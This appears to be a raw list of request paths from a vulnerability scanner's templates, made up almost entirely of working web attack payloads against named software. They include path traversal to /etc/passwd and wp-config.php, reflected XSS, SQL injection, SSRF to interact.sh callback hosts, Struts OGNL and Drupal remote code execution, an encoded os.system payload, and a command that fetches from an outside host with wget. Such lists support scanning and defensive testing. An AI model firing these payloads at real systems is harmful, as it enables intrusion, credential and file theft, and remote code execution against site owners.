"/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cadgqm02toabu64p21o0ckx3unyyeabmy.interact.sh')",
"/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd",
"/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///",
"/webtools/control/SOAPService",
"/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2A6Shn5xRkpSk4MxVJi8L2jgkZj.txt",
"/__raw/services/server/info/server-info?output_mode=json",
"/api/get_device_details",
"/action/usermanager.htm",
"/webGui/images/green-on.png/?path=x&site%5Bx%5D%5Btext%5D=%3C?php%20phpinfo();%20?%3E",
"/anchor/errors.log",
"/ajax/render/widget_tabbedcontainer_tab_panel",
"/src/redirect.php?plugins%5B%5D=../../../../etc/passwd%00",
"/boafrm/formSysCmd",
"/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth",
"/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F%7B%7Bform_build_id%7D%7D",
"/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/.../.../.../.../.../.../.../.../.../windows/win.ini",
"/plugins/servlet/svnwebclient/error.jsp?errormessage='%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test",
"/account/index.php",
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00",
"/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&Send=Filter",
"/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00",
"/advanced_component_system/index.php?ACS_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
"/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin-ajax.php?action=2632ddf0e15df130d9746a22ce1d045e",
"/http_header.php",
"/RPC2",
"/website/blog/",
"/api/users",
"/metrics/v1/mbeans",
"/node/1?_format=hal_json",
"/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php",
"/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E",
"/api/jsonws/invoke",
"/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/ReportServer/Pages/ReportViewer.aspx",
"/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22",
"/tmui/locallb/workspace/tmshCmd.jsp",
"/vendor/phpfastcache/phpfastcache/examples/phpinfo.php",
"/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini",
"/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php",
"/wp-content/plugins/qards/html2canvasproxy.php?url=https://cadgqm02toabu64p21o0cktfmsoytcqco.interact.sh",
"/?host=http://0177.0.0.1/server-status",
"/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=nX7J5g&adminpassword=nX7J5g&adminemail=test@test.com&adminname=test",
"/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/document.php?modulepart=project&file=../../../../../../../etc/passwd",
"/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A",
"/spaces/viewdefaultdecorator.action?decoratorName",
"/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00",
"/hsqldb%0A",
"/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E",
"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php",
"/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/",
"/bugs/verify.php?confirm_hash=&id=1",
"/cgi-bin/libagent.cgi?type=J",
"/maint/index.php?packages",
"/index.php?r=i/../../../../../etc/passwd",
"/assets/file:%2F%2F/etc/passwd",
"/rest/v1/AccountService/Accounts",
"/wp-content/plugins/wsecure/wsecure-config.php",
"/context.json",
"/x",
"/api/v1/login/oauth2/auth",
"/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)",
"/setup.cgi?todo=debug&x=currentsetting.htm",
"/fileupload/toolsAny",
"/fileserver/test.txt",
"/html/device-id",
"/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd",
"/services/pluginscript/..;/..;/..;/getFavicon?host=cadgqm02toabu64p21o0ckq6x4yygeyee.interact.sh",
"/uploads/assets/backend/elfinder/elfinder-cke.html",
"/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&submit=Search",
"/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/zb_system/cmd.php?act=verify",
"/rest/issueNav/1/issueTable",
"/creaprezzi.php?prezzoperiodo4=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E",
"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow%3E%3C/TITLE%3E%3C/HEAD%3E%3Cbody%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C!--&%3EhelpFile=concepts.html",
"/www/delivery/afr.php?refresh=10000&%22)',10000000);alert(1337);setTimeout('alert(%22",
"/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd",
"/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd",
"/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd",
"/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)",
"/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/auth/check",
"/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL",
"/version.web",
"/apply.cgi",
"/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini",
"/php/demo.php",
"/backend/elfinder/elfinder-cke.html",
"/boardDataWW.php",
"/assets/php/upload.php",
"/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php",
"/adm/file.cgi?next_file=%2Fetc%2Fpasswd",
"/sidekiq/queues/%22onmouseover=%22alert(nuclei)%22",
"/var",
"/%2F..%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/kylin/api/admin/config",
"/timesheet/login.php",
"/uploads/assets/backend/elfinder/elfinder.html",
"/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs",
"/?c=../../../../../../etc/passwd%00",
"/user/scripts/login_par.js",
"/ui_base/js/..%2F..%2F..%2F..%2Fsettings.js",
"/web_shell_cmd.gch",
"/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/graphql",
"/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00",
"/EemAdminService/EemAdmin",
"/html/repository",
"/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00",
"/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO",
"/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?download=/etc/passwd",
"/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0",
"/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00",
"/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1",
"/index.php?q=file:///etc/passwd",
"/index.php",
"/?s=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini",
"/?author=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/AdminTools/querybuilder/logon?framework=",
"/images/..%2Finfo.html",
"/search.htm?searchstring2=&searchstring='%3E%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/login?LD_DEBUG=files",
"/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00",
"/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E",
"/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00",
"/console/login/LoginForm.jsp",
"/openx/www/delivery/lg.php?dest=http://example.com",
"/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php",
"/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd",
"/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/homeaction.php",
"/search/",
"/web/static/c:/windows/win.ini",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini",
"/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E",
"/cgi-bin/status",
"/wp-json/wp/v2/users/",
"/Items/RemoteSearch/Image?ImageUrl=http://cadgqm02toabu64p21o0ckof1jeym8yww.interact.sh&ProviderName=TheMovieDB",
"/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd",
"/rest/tinymce/1/macro/preview",
"/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/misc.php?action=showpopups&type=friend",
"/?mp_idx=%22;alert('1');//",
"/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/lucee/2A6Shtr4a9fcLliFOzxU3XTS91i.cfm",
"/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd",
"/SDK/webLanguage",
"/wls-wsat/RegistrationRequesterPortType",
"/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00",
"/awstats/awredir.pl?url=example.com",
"/wp-content/plugins/simple-ajax-chat/sac-export.csv",
"/contrib/acog/print_form.php?formname=../../../etc/passwd%00",
"/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;",
"/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5Econfirm(document.domain)%5E%22a2pbrnzx5a9",
"/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.jsp",
"/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E=1",
"/messages",
"/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd",
"/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?q=%7B%7Buserid%7D%7D%2Fcancel&destination=%7B%7Buserid%7D%7D%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+%7C+rev",
"/STATE_ID/123/agentLogUploader",
"/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development",
"/index.action?redirect:http://www.example.com/",
"/dataservice/disasterrecovery/download/token/..%2F..%2F..%2F%2Fetc%2Fpasswd",
"/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
"/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00",
"/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com",
"/command.cgi?cat%20/etc/passwd",
"/?IO.popen('cat%20%2Fetc%2Fpasswd').read%0A%23",
"/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd",
"/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd",
"/TransferredOutModal.php?modfunc=detail",
"/settings.php",
"/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22",
"/diag_routes.php?isAjax=1&filter=.*/!d;%7D;s/Destination/%5Cx3c%5Cx3fphp+var_dump(md5(%5Cx27CVE-2021-41282%5Cx27));unlink(__FILE__)%5Cx3b%5Cx3f%5Cx3e/;w+/usr/local/www/test.php%0A%23",
"/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/login.php?mid=0&usr=admin'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/goforms/rlminfo",
"/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com",
"/poc.jsp?cmd=cat+%2Fetc%2Fpasswd",
"/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs",
"/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com",
"/module/api.php?mobile/webNasIPS",
"/cgi-bin/status/status.cgi",
"/modules/babel/redirect.php?newurl=http://example.com",
"/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2A6ShnN5h8e1ptwCxLuEDdzGSeV.jsp",
"/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains",
"/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00",
"/account",
"/_users/org.couchdb.user:poc",
"/device.rsp?opt=user&cmd=list",
"/login?redirect=%2F",
"/servlet/UploadServlet",
"/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open",
"/ws_utc/css/config/keystore/%7B%7Bid%7D%7D_2A6ShrwW6Wz1gtgjfScA4J8bRB5.jsp",
"/kindeditor/php/demo.php",
"/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00",
"/?page_id=0&&errors%5Bfu-disallowed-mime-type%5D%5B0%5D%5Bname%5D=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/webadmin/auth/verification.php",
"/?noptin_ns=email_click&to=https://example.com",
"/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E",
"/dompdf.php?input_file=dompdf.php",
"/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
"/magmi/web/info.php",
"/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/includes/dompdf/dompdf.php?input_file=dompdf.php",
"/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00",
"/updating.jsp?url=https://example.com/",
"/adm/krgourl.php?DOCUMENT_ROOT=http://cadgqm02toabu64p21o0ckom67oyck761.interact.sh",
"/admin/?n=language&c=language_general&a=doExportPack",
"/wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=skatubazar_option",
"/webmail/calendar/minimizer/index.php?style=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini",
"/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData",
"/?s=%3Cimg%20src%3Dx%20onerror%3Dalert(123)%3B%3E",
"/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00",
"/login/",
"/NateMail.php",
"/wp-admin/admin.php?page=vfb-export",
"/template/custom/content-editor",
"/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2A6Shsw4gl5lnlVlSLQ81dUYSVZ/)%3B%2F%2F",
"/users/sign_in",
"/themes",
"/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00",
"/images/..%2Fapply_abstract.cgi",
"/jira/secure/BrowseProject.jspa?id=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/test",
"/v2/api/product/manger/getInfo",
"/login",
"/confluence/pages/createpage-entervariables.action",
"/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd",
"/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://cadgqm02toabu64p21o0ckob3ceyjwfse.interact.sh",
"/assets/php/profile.php",
"/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22",
"/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF",
"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
"/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert(document.domain)%22%3E.vm",
"/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs",
"/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00",
"/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-json/wp/v2/posts?per_page=1",
"/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ecustom_name'%3A'Cairo'%2C'animated'%3A'true'%7D",
"/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==",
"/?id=%25%7B(%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D).(%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D).(%23bean%3D%23instancemanager.newInstance(%22org.apache.commons.collections.BeanMap%22)).(%23bean.setBean(%23stack)).(%23context%3D%23bean.get(%22context%22)).(%23bean.setBean(%23context)).(%23macc%3D%23bean.get(%22memberAccess%22)).(%23bean.setBean(%23macc)).(%23emptyset%3D%23instancemanager.newInstance(%22java.util.HashSet%22)).(%23bean.put(%22excludedClasses%22%2C%23emptyset)).(%23bean.put(%22excludedPackageNames%22%2C%23emptyset)).(%23arglist%3D%23instancemanager.newInstance(%22java.util.ArrayList%22)).(%23arglist.add(%22cat+%2Fetc%2Fpasswd%22)).(%23execute%3D%23instancemanager.newInstance(%22freemarker.template.utility.Execute%22)).(%23execute.exec(%23arglist))%7D",
"/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22",
"/login/?uid=%22%3E%3Cimg%20src=%22x%22%20onerror=%22alert('XSS');%22%3E",
"/esp/cms_changeDeviceContext.esp?device=aaaaa:a'%22;user%7Cs.%221337%22;",
"/webadmin/tools/unixlogin.php?login=admin&password=g'%2C'')%3Bimport%20os%3Bos.system('6563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))%23&timeout=5",
"/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..%5C..%5C..%5Cwindows%5Cwin.ini",
"/wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/script%3E?page=securimage-wp-options%2F",
"/wp-content/plugins/wp-mail-smtp-pro/",
"/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00",
"/index.php?v=d&p=%22;alert(document.domain);%22",
"/ui/api/v1/ui/auth/login",
"/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini",
"/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00",
"/community/?foro=signin&redirect_to=https://example.com/",
"/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3Cscript%3Econfirm(2A6ShoPD9M0yJk75tPZunN3zLGZ)%3C%2Fscript%3E&win=2707",
"/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search",
"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cadgqm02toabu64p21o0ckxo1wyyeyioc.interact.sh",
"/status.htm",
"/test.txt",
"/wp-content/plugins/wp-payeezy-pay/donate.php",
"/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00",
"/lua/.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Ffind_prefs.lua.css",
"/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php",
"/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com",
"/wp-admin/admin-ajax.php",
"/modifica_cliente.php?tipo_tabella=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E&idclienti=1",
"/magmi/web/magmi_run.php",
"/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E",
"/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00",
"/Login?!'%3E%3CsVg/OnLoAD=alert%601337%60//",
"/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00",
"/%7B%7Bpath%7D%7D/tree/a/search",
"/LetsEncrypt/Index?fileName=/etc/passwd",
"/webadmin/clientlogin/?srid=&action=showdeny&url=",
"/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/file://%7B%7Bpath%7D%7D/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd",
"/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users",
"/2A6ShnTJOalevPUKp3S5ZuIZpCI.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://cadgqm02toabu64p21o0cktn1yyyty4do.interact.sh%22)%7D'",
"/api/graphql",
"/password.html",
"/?author=1",
"/auth/logout?continue=//example.com",
"/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E",
"/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/index_sso.php",
"/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wls-wsat/CoordinatorPortType",
"/test.txt%0D%0ASet-Cookie:CRLFInjection=Test%0D%0ALocation:%20example.com%0D%0AX-XSS-Protection:0",
"/confluence/pages/createpage-entervariables.action?SpaceKey=x",
"/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D",
"/index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input",
"/templates/editor-preload-container",
"/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd",
